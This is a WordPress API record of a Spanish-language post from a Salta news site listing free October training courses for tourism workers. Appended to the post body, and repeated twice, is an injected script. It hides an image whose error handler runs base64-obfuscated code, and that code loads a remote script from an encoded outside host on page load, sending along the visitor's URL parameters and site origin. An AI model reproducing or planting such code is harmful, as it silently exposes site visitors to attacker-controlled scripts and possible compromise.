{"id":4500,"date":"2024-10-15T08:31:01","date_gmt":"2024-10-15T11:31:01","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4500"},"modified":"2025-08-13T23:47:15","modified_gmt":"2025-08-14T02:47:15","slug":"capacitaciones-gratuitas-de-formacion-para-el-sector-turistico","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4500","title":{"rendered":"Capacitaciones gratuitas de formaci\u00f3n para el sector tur\u00edstico"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-text-color has-link-color wp-elements-ffedf46307c4be78eb1a80e01aa9a4c9\" style=\"color:#98064d\"><strong><em>Durante el mes de octubre continuar\u00e1n distintos cursos gratuitos a trav\u00e9s del Plan tur\u00edstico \u201cHacia un destino sostenible\u201d para contribuir a la formaci\u00f3n profesional de los prestadores del sector tur\u00edstico y mejorar la calidad en la prestaci\u00f3n de los servicios.<\/em><\/strong><\/h4>\n\n\n\n<p><strong>El Ministerio de Turismo y Deportes de Salta<\/strong>, a trav\u00e9s del Plan Integral de Capacitaci\u00f3n Tur\u00edstica \u201cHacia un destino sostenible\u201d, brindar\u00e1 capacitaciones gratuitas de formaci\u00f3n para prestadores tur\u00edsticos. Para informes e inscripciones dirigirse a&nbsp;<a href=\"http:\/\/capacitacion@turismosalta.gov.ar\/\">capacitacion@turismosalta.gov.ar<\/a><\/p>\n\n\n\n<p>En este aspecto, el sector p\u00fablico y privado vinculado a la actividad podr\u00e1 acceder durante el mes de octubre a los siguientes cursos gratuitos de modalidades presenciales, virtuales, h\u00edbridas y asincr\u00f3nicas:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>T\u00e9cnicas de Guiado e Interpretaci\u00f3n del Patrimonio: 17, 21, 24, 28 y 30 de octubre. Dictado por Ver\u00f3nica Velardo, destinado a gu\u00edas locales de Nazareno. Sincr\u00f3nico y asincr\u00f3nico.<\/li>\n\n\n\n<li>Gastronom\u00eda y Sustentabilidad, las cocinas salte\u00f1as hacia el km 0: 21 de octubre. Dictado por Olga Lubel de la Fundaci\u00f3n Yac\u00f3n, destinado a emprendedores gastron\u00f3micos. Virtual<\/li>\n\n\n\n<li>El rol del l\u00edder: desaf\u00edos en el contexto actual: 15, 22 y 30 de octubre. Dictado por la Lic. Andrea Goldfeder, destinado a prestadores de turismo. Virtual.<\/li>\n\n\n\n<li>Gesti\u00f3n eficiente de la energ\u00eda: 17 de octubre. Dictado por el Instituto Nacional de Tecnolog\u00eda Industrial, destinado a prestadores del sector tur\u00edstico. Virtual.<\/li>\n\n\n\n<li>Primeros auxilios: 17 y 18 de octubre. Dictado por el Dr. Rodolfo Pastore, destinado a gu\u00edas y prestadores de turismo de Mosconi. Presencial.<\/li>\n\n\n\n<li>Servicio y atenci\u00f3n al visitante: 18 de octubre. Dictado por Natalia Urquiza, destinado a prestadores de turismo de La Vi\u00f1a. Presencial.<\/li>\n<\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretaria de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Durante el mes de octubre continuar\u00e1n distintos cursos gratuitos a trav\u00e9s del Plan tur\u00edstico \u201cHacia un destino sostenible\u201d para contribuir a la formaci\u00f3n profesional de los prestadores del sector tur\u00edstico y mejorar la calidad en la prestaci\u00f3n de los servicios. El Ministerio de Turismo y Deportes de Salta, a trav\u00e9s del Plan Integral de Capacitaci\u00f3n [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4501,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,15],"tags":[],"class_list":{"0":"post-4500","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-provincial"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4500"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4500"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4500\/revisions"}],"predecessor-version":[{"id":6662,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4500\/revisions\/6662"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4501"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4500"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4500"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4500"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}